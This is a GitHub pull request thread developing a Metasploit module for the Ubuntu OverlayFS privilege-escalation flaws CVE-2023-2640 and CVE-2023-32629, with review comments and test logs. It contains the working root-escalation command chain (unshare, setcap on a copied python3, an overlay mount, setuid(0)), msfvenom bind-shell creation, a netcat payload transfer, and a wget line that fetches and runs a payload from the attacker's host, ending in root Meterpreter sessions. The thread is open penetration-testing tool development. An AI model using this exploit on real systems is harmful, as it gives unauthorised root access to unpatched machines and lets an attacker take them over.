CVE-2023-2640, CVE-2023-32629 Game Overlay Ubuntu Privillege Escalation
rapid7/metasploit-framework pull request #19460
Opened 2024-09-13 14:07 UTC by gardnerapp

This module was originally suggested by #18765 and builds on [this PoC](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629) from @g1vi.  CVE-2023-2640 and CVE-2023-32629 allow for privilege escalation on Ubuntu systems due to a failure to call `vfs_setxattr` during execution of `ovl_do_setxattr`, this results in the failure to sanitize file capabilities during file system union process. [This article](https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#what-is-gameoverlay-7) explains the technical details of the vulnerability much better then I can and also provides a convenient list of vulnerable Ubuntu and Kernel versions. 

This exploit was tested on Ubuntu Focal Fossa 20.04.6 with a 5.4.0-1018-aws kernel. I changed the Kernel version by following [this tutorial ](https://www.youtube.com/watch?v=NWddYt3WN80), the google drive doc linked in the video is probably quicker to read. Please note that I used a bind shell to connect to the system, and a bind shell as a payload for the exploit. I am well aware that bind shells are frowned upon IRL because of firewalls, IDS, etc. I only had to use one because I don't have access to a Linux System outside of the cloud. 

## Verification

1, Target System
```
ubuntu@ubuntu ~$ cat /etc/os-release && uname -a
NAME="Ubuntu"VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal
Linux 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

2. Creating a bind shell
`msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=5555 -f elf -o bind.elf`

3. Transfer the bind shell
I used netcat 
On remote machine: `nc -lvnp 1234 > bind.elf`
Local machine `cat bind.elf > <REMOTE IPADDRESS> 1234`

4. Execute the bind shell
`chmod +x bind.elf && ./bind.elf`

5. Start msf and connect to bind shell
```
$ msfconsole

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meteroreter/bind_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:5555
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 1 opened (172.16.227.214:52193 -> 54.158.170.60:5555) at 2024-09-13 09:48:31 -0400

meterpreter > shell
Process 9129 created.
Channel 1 created.
whoami
ubuntu
exit
meterpreter > bg
[*] Backgrounding session 1...
```

6. Running the exploit, I unfortunately also had to use a bind shell for this. 
```
msf6 exploit(multi/handler) > use exploit/linux/local/game_overlay_privesc 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set session 1 
session => 1
msf6 exploit(linux/local/game_overlay_privesc) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf6 exploit(linux/local/game_overlay_privesc) > set lport 6666
lport => 6666
msf6 exploit(linux/local/game_overlay_privesc) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Focal Fossa
[*] Detected kernel version: 5.4.0-1018-aws
[+] The target is vulnerable. Focal Fossa with 5.4.0-1018-aws kernel is vunerable
[*] Creating directory /tmp/main/l
[*] Creating directory /tmp/main/u
[*] Creating directory /tmp/main/w
[*] Creating directory /tmp/main/m
[*] Creating directory to store payload: /tmp/main/
[*] Writing payload: /tmp/main/marv
[*] Starting new namespace, and running exploit...
[*] Running exploit: 'unshare -rm sh -c "cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system("chmod +x /tmp/main/marv && /tmp/main/marv")' ' 

false
[*] Command Stager progress - 100.00% done (747/747 bytes)
[*] Started bind TCP handler against :6666
[*] Exploit completed, but no session was created.
```

There is now a bind shell running on the system with root level privileges. On the remote system you can verify the listening port with `ss -ano | grep 6666` 

7. Connect to the root bind shell
```
msf6 exploit(linux/local/game_overlay_privesc) > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > set rhost 54.158.170.60
rhost => 54.158.170.60
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.158.170.60:6666
[*] Sending stage (1017704 bytes) to 54.158.170.60
[*] Meterpreter session 2 opened (172.16.227.214:52242 -> 54.158.170.60:6666) at 2024-09-13 09:53:31 -0400

meterpreter > shell
Process 9532 created.
Channel 1 created.
whoami
root
```
Here are some Pictures

Open bind port on target: 
![bind_shell](https://github.com/user-attachments/assets/05b5893a-4783-4df0-8313-d78e22e8aaa9)

Process list after payload execution `marv` is meterpreter running as root
![processes](https://github.com/user-attachments/assets/0a137ccc-eadc-4da6-9176-51fb2796a08f)

Exploit
<img width="1417" alt="Screenshot 2024-09-13 at 9 54 15 AM" src="https://github.com/user-attachments/assets/839708e7-9a1f-4de1-b44e-2f3d478473d1">

<img width="1436" alt="Screenshot 2024-09-13 at 9 53 49 AM" src="https://github.com/user-attachments/assets/585df2d7-d266-4789-9ca6-b7f8f2958068">

2024-09-14 19:01 UTC, jvoisin requested changes

2024-09-14 19:01 UTC, jvoisin commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tm
This is a tad unreadable, please use new lines. Also, it seems that Python3 is a hard requirement for this exploit. Either make this explicit in the module requirements, or change it to something more ubiquitous, like a shell script.

2024-09-17 13:19 UTC, gardnerapp commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tm
I'll us a shell instead of python, I want to use `sh` but should I add support for other shells to?

2024-09-17 14:11 UTC, jvoisin commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tm
`sh` is good enough™ I'd say: if you're running a box without `sh` on it, odds are that you're doing really odd stuff.

2024-09-18 13:30 UTC, bcoles commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +      cmd_exec "mkdir -p #{dir}"
> Use `FileUtils.mkdir_p` instead

`FileUtils.mkdir_p` would be executed on the Metasploit host. The method you're looking for is `Msf::Post::File.mkdir` which uses `mkdir -p`:

https://github.com/rapid7/metasploit-framework/blob/409b1aed453b175f426afaaddc936f4715eef341/lib/msf/core/post/file.rb#L120-L137

2024-09-18 13:32 UTC, bcoles commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +      mkdir_p dir
```suggestion
      mkdir(dir)
```

https://github.com/rapid7/metasploit-framework/pull/19460#discussion_r1765065582

2024-09-18 14:31 UTC, gardnerapp commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tm
I'm going to stick with python for the exploit, how should I make sure the user knows that it is required?

2024-09-19 14:19 UTC, jheysel-r7 reviewed
Thanks for the great module! One minor nitpick but could we remove the underscore so the filename is `gameoverlay_privesc`?

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    fail_with(Failure::NotVulnerable, 'Target is not linux') unless session.platform == 'linux'
We should try and avoid using `fail_with` in the check method as it should always return a `CheckCode`.
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    puts cmd_exec_with_result(hack)
Please use `print_status` instead of `puts`. There's a couple instances of this. 
```suggestion
    print_status(cmd_exec_with_result(hack))
```

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +      ::FileUtils.mkdir_p dir
This will create a local directory, should this be a call to `mkdir` instead? This is a command is included in ` Msf::Post::File` and will register the file for cleanup. There should be some good examples in here: 
test/modules/post/test/file.rb

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +  end
There should be a final `CheckCode` returned here. Either `Safe` or `Unknown`.

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +    cmd_exec "mkdir -p #{pay_dir}"
```suggestion
    mkdir "#{pay_dir}"
```

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +        setcap cap_setuid+eip #{pay_dir}l/python3;
You'll have to update this to target the executable instead of `python3`

2024-09-19 14:19 UTC, jheysel-r7 commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
Could this be replaced with the path to the payload. We have a datastore option `PrependSetuid` that be set to replace `os.setuid(0);`.  Also the CmdStaged mixin can be removed along with the call to `execute_cmdstager`. This will simplify things a bit and allow the exploit to work when `python3` isn't available on the system.

2024-09-20 14:13 UTC, gardnerapp commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +      cmd_exec "mkdir -p #{dir}"
`mkdir` isn't working. Rest of exploit fails because directory isn't being created. When I run `Msf::Post::File.mkdir` I get a no such method error. -`Exploit failed: NoMethodError undefined method `mkdir' for Msf::Post::File:Module`

2024-09-20 14:18 UTC, gardnerapp commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +      cmd_exec "mkdir -p #{dir}"
Update: I had the `FileUtils` module included below Msf::Post::File, it was calling the mkdir command from that module and creating those on the host. I thought I was going insane for a second lol.

2024-09-20 14:45 UTC, gardnerapp commented
Not ready to be merged Getting `syntax error unexpected &&` in the first `cmd_exec_with_result` call.

2024-09-20 14:46 UTC, gardnerapp commented on modules/exploits/linux/local/game_overlay_privesc.rb
> +        setcap cap_setuid+eip #{pay_dir}l/python3;
Working on testing this now.

2024-09-26 20:47 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux
I'm guessing this reference to cve-2021-3493 is a copy/paste remnant from the older overlayfs module?

2024-09-27 16:46 UTC, bwatters-r7 commented
@gardnerapp I wanted to let you know I've started working on this yesterday.  It was super close, so I only did a couple minor changes and was able to get execution.  I want to see if I can also get the ARCH_CMD payloads to work, since it is a command we're issuing and it _should_ be straightforward 😆 .  I hop I can get a PR to you with suggestions sometime today (US time).

Also, I was able to get a local VM to be vulnerable by downloading Ubuntu 22.04x64 and running:

```
sudo apt update
sudo apt install -y linux-image-5.19.0-41-generic linux-headers-5.19.0-41-generic
reboot
```

I did it immediately and then took the VM offline in case it was silently patched.

2024-09-28 01:45 UTC, bwatters-r7 reviewed
I was able to get it to work with both binary and ARCH_CMD payloads. 
 In case I missed anything, I put up a working version here:
 
 https://github.com/bwatters-r7/metasploit-framework/blob/cve-2023-32629/modules/exploits/linux/local/gameoverlay_privesc.rb
 
 Here it is using both binary and ARCH_CMD payloads targets:
 
 ```
msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/TIMMJsZ/
[*] Creating directory /tmp/TIMMJsZ/
[*] /tmp/TIMMJsZ/ created
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] Creating directory /tmp/TIMMJsZ/JpDsTcJSHs/
[*] /tmp/TIMMJsZ/JpDsTcJSHs/ created
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] Creating directory /tmp/TIMMJsZ/gvuIpvd/
[*] /tmp/TIMMJsZ/gvuIpvd/ created
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] Creating directory /tmp/TIMMJsZ/FZrdUUPoKwg/
[*] /tmp/TIMMJsZ/FZrdUUPoKwg/ created
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] Creating directory /tmp/TIMMJsZ/ZSwBHcRmY/
[*] /tmp/TIMMJsZ/ZSwBHcRmY/ created
[*] Writing payload: /tmp/TIMMJsZ/marv
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/TIMMJsZ/JpDsTcJSHs/; setcap cap_setuid+eip /tmp/TIMMJsZ/JpDsTcJSHs/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/TIMMJsZ/JpDsTcJSHs/,upperdir=/tmp/TIMMJsZ/gvuIpvd/,workdir=/tmp/TIMMJsZ/FZrdUUPoKwg/ /tmp/TIMMJsZ/ZSwBHcRmY/ && touch /tmp/TIMMJsZ/ZSwBHcRmY/*; " && /tmp/TIMMJsZ/gvuIpvd/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && chmod +x /tmp/TIMMJsZ/marv && /var/tmp/bash -p -c /tmp/TIMMJsZ/marv &&  rm -rf /tmp/TIMMJsZ/JpDsTcJSHs/ /tmp/TIMMJsZ/ZSwBHcRmY/ /tmp/TIMMJsZ/gvuIpvd/ /tmp/TIMMJsZ/FZrdUUPoKwg/ /var/tmp/bash")'
[+] Deleted /tmp/TIMMJsZ/
[*] Meterpreter session 37 opened (10.5.135.201:4585 -> 10.5.132.129:41602) at 2024-09-27 20:21:47 -0500
[*] 

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 37

[*] 10.5.132.129 - Meterpreter session 37 closed.  Reason: User exit
msf6 exploit(linux/local/gameoverlay_privesc) > set target 1
target => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp 
payload => cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Command to run on remote host: wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS Codename = (Jammy Jellyfish)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/qowPTdD/
[*] Creating directory /tmp/qowPTdD/
[*] /tmp/qowPTdD/ created
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] Creating directory /tmp/qowPTdD/aRZdFGYWbp/
[*] /tmp/qowPTdD/aRZdFGYWbp/ created
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] Creating directory /tmp/qowPTdD/krILBcsetBfz/
[*] /tmp/qowPTdD/krILBcsetBfz/ created
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] Creating directory /tmp/qowPTdD/KahdTIAH/
[*] /tmp/qowPTdD/KahdTIAH/ created
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] Creating directory /tmp/qowPTdD/KqwYrX/
[*] /tmp/qowPTdD/KqwYrX/ created
[*] Starting new namespace, and running exploit...
[*] unshare -rm sh -c "cp /usr/bin/python3 /tmp/qowPTdD/aRZdFGYWbp/; setcap cap_setuid+eip /tmp/qowPTdD/aRZdFGYWbp/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/qowPTdD/aRZdFGYWbp/,upperdir=/tmp/qowPTdD/krILBcsetBfz/,workdir=/tmp/qowPTdD/KahdTIAH/ /tmp/qowPTdD/KqwYrX/ && touch /tmp/qowPTdD/KqwYrX/*; " && /tmp/qowPTdD/krILBcsetBfz/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod +x /var/tmp/bash && /var/tmp/bash -p -c \"wget -qO ./IWtillzOhEDS http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w; chmod +x ./IWtillzOhEDS; ./IWtillzOhEDS &\" rm -rf /tmp/qowPTdD/aRZdFGYWbp/ /tmp/qowPTdD/KqwYrX/ /tmp/qowPTdD/krILBcsetBfz/ /tmp/qowPTdD/KahdTIAH/ /var/tmp/bash")'
[*] Client 10.5.132.129 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.132.129 (Wget/1.21.2)
[+] Deleted /tmp/qowPTdD/
[*] 
[*] Meterpreter session 38 opened (10.5.135.201:4585 -> 10.5.132.129:57044) at 2024-09-27 20:23:05 -0500

meterpreter > getuid
Server username: root
 
 ```

2024-09-28 01:45 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +        }
```suggestion
        'Targets' => [
          [
            'Linux_Binary',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'PrependSetuid' => true
            }
          ],
          [
            'Linux_Command',
            {
              'Arch' => ARCH_CMD,
              'Payload' =>
                {
                  'BadChars' => "\x93\x94"
                }
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
```
This added the ARCH_CMD target option and marked quotation marks as bad chars.  I don't think that we need the `Prependsetuid` in the binary since we do it in the python code.
Also, I added a notes section, as required.  I think those are right?

2024-09-28 01:45 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
```suggestion
    pay_file = datastore['PayloadFilename']
    pay_dir = datastore['WritableDir']
    pay_dir += "/" unless pay_dir.ends_with? "/"
    pay_dir += Rex::Text.rand_text_alpha 10
    pay_dir += "/" unless pay_dir.ends_with? "/"
    print_status "Creating directory to store payload: #{pay_dir}"
    mkdir pay_dir
    pay_dir = datastore['WritableDir']
    pay_dir << '/' unless pay_dir.ends_with? '/'
    pay_dir += Rex::Text.rand_text_alpha(rand(6..13))
    pay_dir << '/'
    directories = []
    directories << pay_dir
    lower_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
    directories << lower_dir
    upper_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
    directories << upper_dir
    work_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
    directories << work_dir
    merge_dir = pay_dir + Rex::Text.rand_text_alpha(rand(6..13)) + '/'
    directories << merge_dir
    bash_copy = '/var/tmp/bash'
 ```
    
This just randomizes the upper dir, lower dir, working dir, payload dir, and merge dir and gives them easy to remember variable names.
We should randomize the name of the bash copy, but I did not do that, yet.

2024-09-28 01:45 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    print_status 'Starting new namespace, and running exploit...'
```suggestion
    if target.arch.first == ARCH_CMD
      payload_cmd = "\\\"#{payload.encoded}\\\""
    else
      pay_file = datastore['PayloadFilename']
      payload_path = "#{pay_dir}#{pay_file}"
      print_status "Writing payload: #{payload_path}"
      write_file(payload_path, generate_payload_exe)
      payload_cmd = payload_path
    end
```
This just sets everything up so that we execute the command or the binary payload, depending on which the user suggests.  Commands have to be encapsulated in escaped quotation marks to work.

2024-09-28 01:45 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    print_status(cmd_exec_with_result(trigger).to_s)
```suggestion
    # Build the command

    exploit_cmd = 'unshare -rm sh -c "'
    exploit_cmd << "cp #{cmd_exec('which python3')} #{lower_dir}; "
    exploit_cmd << "setcap cap_setuid+eip #{lower_dir}python3; "
    exploit_cmd << "mount -t overlay overlay -o rw,lowerdir=#{lower_dir},upperdir=#{upper_dir},workdir=#{work_dir} #{merge_dir} && "
    exploit_cmd << "touch #{merge_dir}*; \" && "
    exploit_cmd << "#{upper_dir}python3 -c 'import os;os.setuid(0);os.system("
    exploit_cmd << "\"cp /bin/bash #{bash_copy} && chmod +x #{bash_copy} && "
    exploit_cmd << "chmod +x #{payload_cmd} && " unless target.arch.first == ARCH_CMD
    exploit_cmd << "#{bash_copy} -p -c "
    exploit_cmd << payload_cmd
    exploit_cmd << ' && ' unless target.arch.first == ARCH_CMD
    exploit_cmd << " rm -rf #{lower_dir} #{merge_dir} #{upper_dir} #{work_dir} #{bash_copy}\")'"

    vprint_status(exploit_cmd.to_s)

    output = cmd_exec(exploit_cmd)
    print_status(output)
```

I could not wrap my head around the command as a single line, so to help debug I split it into manageable sections to help me see what was happening.  The main change I did was to pass the binary payload into the copied bash binary with the `-c` command.  I think there's a mismatch on permissions and the environment, so you've got to have the `-p`.  Simply trying to execute the binary payload directly fails without it.

2024-09-29 12:05 UTC, gardnerapp commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
I like this a lot, more readable.

2024-09-29 12:12 UTC, gardnerapp commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux
No, this is not a copy and paste from the other module. The description I gave for this module may have been too high level. CVE-2021-3493 effects the Linux kernel and then it was patched. Ubuntu made separate changes to the kernel and those changes did not incorporate the patches made to the original Linux kernel resulting in [CVE-2023-32629](https://ubuntu.com/security/CVE-2023-32629) and [CVE-2023-2640](https://ubuntu.com/security/CVE-2023-2640). 

I'm not sure if you've read [this article already](https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability) but it does a tremendous job explaining the technical workings of the vulnerabilities within OverlayFS and how they arose. Should we just take the mention of CVE-2021-3493 out of the description for simplicity sake?

2024-09-30 17:23 UTC, bwatters-r7 commented
@gardnerapp do you have the time to add documentation to this?
See https://github.com/rapid7/metasploit-framework/pull/19460#issuecomment-2361083661

2024-09-30 21:19 UTC, jvoisin commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
Dumb question, but why those two architecture only? The exploit seems quite portable to me.

2024-10-02 18:52 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    bash_copy = '/var/tmp/bash'
Thank you!  I completely forgot I tried to randomize this and place the copy in the exploit folder, but when I did, the exploit failed; I completely forgot to keep digging at it, though.  I'll look at it again.

2024-10-02 18:56 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
Absolutely.  Those are the only ones we tested on.  If I get a chance I'll try it out on a Ubuntu AARCH_64, which I think is the only other Ubuntu arch?

2024-10-02 18:59 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
Now that you mention it, x86 is not supported by Ubuntu, anymore, so we should remove it.
![image](https://github.com/user-attachments/assets/9fa8b8b0-6fb9-4b6d-b977-468da3430cf0)

2024-10-02 19:00 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
Happy to add anything anyone wants to test and verify- I'll do AARCH_64. 🎉

2024-10-02 21:30 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
AARCH64 does work:
```
[*] Meterpreter session 1 opened (10.5.135.201:4588 -> 10.5.132.149:60980) at 2024-10-02 16:27:35 -0500

msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/aarch64/meterpreter_reverse_tcp) > use exploit/linux/local/gameoverlay_privesc 
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set session 1
session => 1
msf6 exploit(linux/local/gameoverlay_privesc) > set target 0
target => 0
msf6 exploit(linux/local/gameoverlay_privesc) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(linux/local/gameoverlay_privesc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/gameoverlay_privesc) > show options

Module options (exploit/linux/local/gameoverlay_privesc):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   PayloadFileName  pVmtuGOGXdO      yes       Name of payload
   SESSION          1                yes       The session to run this module on
   WritableDir      /tmp             yes       A directory where we can write files


Payload options (linux/aarch64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux_Binary



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/gameoverlay_privesc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Ubuntu version: Jammy Jellyfish
[*] Detected kernel version: 5.19.0-41-generic
[+] The target is vulnerable. Jammy Jellyfish with 5.19.0-41-generic kernel is vunerable
[*] Creating directory /tmp/UqNFkc/
[*] Creating directory /tmp/UqNFkc/QKZiqWWsnSOz/
[*] Creating directory /tmp/UqNFkc/WbrucZxIAlWZF/
[*] Creating directory /tmp/UqNFkc/uKmqunqY/
[*] Creating directory /tmp/UqNFkc/pwFUmC/
[*] Writing payload: /tmp/UqNFkc/pVmtuGOGXdO
[*] Starting new namespace, and running exploit...
[+] Deleted /tmp/UqNFkc/
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:49168) at 2024-10-02 16:28:43 -0500
[*] 

meterpreter > sysinfo
Computer     : 10.5.132.149
OS           : Ubuntu 22.04 (Linux 5.19.0-41-generic)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > 

```

2024-10-02 21:31 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +              'Arch' => [ ARCH_X86, ARCH_X64 ],
```suggestion
              'Arch' => [ ARCH_AARCH64, ARCH_X64 ],
```
Ubuntu does not have x86 releases anymore, but I verified this works quite well on AARCH64 ubuntu server running `5.19.0-41-generic`.

2024-10-03 14:41 UTC, bwatters-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    pay_dir << '/' unless pay_dir.ends_with? '/'
Check out the Rex join for path

2024-10-03 14:55 UTC, cgranleese-r7 commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    pay_dir = datastore['WritableDir']
We could maybe see if Rex has something for joining these.

2024-10-06 12:35 UTC, gardnerapp commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    pay_dir = datastore['WritableDir']
This was just just an error so I've deleted them from the file. The `PayloadFile` is appended to the `pay_dir` at a latter point in the exploit method.

2024-10-06 12:44 UTC, gardnerapp commented on modules/exploits/linux/local/gameoverlay_privesc.rb
> +    pay_dir << '/' unless pay_dir.ends_with? '/'
I've used `Rex::File.join` for creating the full paths of the merged directories. I've also randomized the `bash` copy with `Rex::Text.rand_text_alpha(rand(6..13))` but haven't tested it. If random alpha numeric characters don't work maybe we could set it as an option like `BashCopy'.

2024-10-15 15:00 UTC, gardnerapp commented
For some reason the Linux Binary payload was no longer working. I added `include Msf::Exploit::Exe` and have successful test for binary payloads:

```
use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/bind_tcp
runmsf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 54.173.113.139:5555
[*] Sending stage (3045380 bytes) to 54.173.113.139
[*] Meterpreter session 7 opened (192.168.0.239:49861 -> 54.173.113.139:5555) at 2024-10-15 10:40:53 -0400

meterpreter > bg
[*] Backgrounding session 7...
msf6 exploit(multi/handler) > use exploit/linux/local/gameoverlay_privesc 
[*] Using configured payload linux/x64/meterpreter/bind_tcp
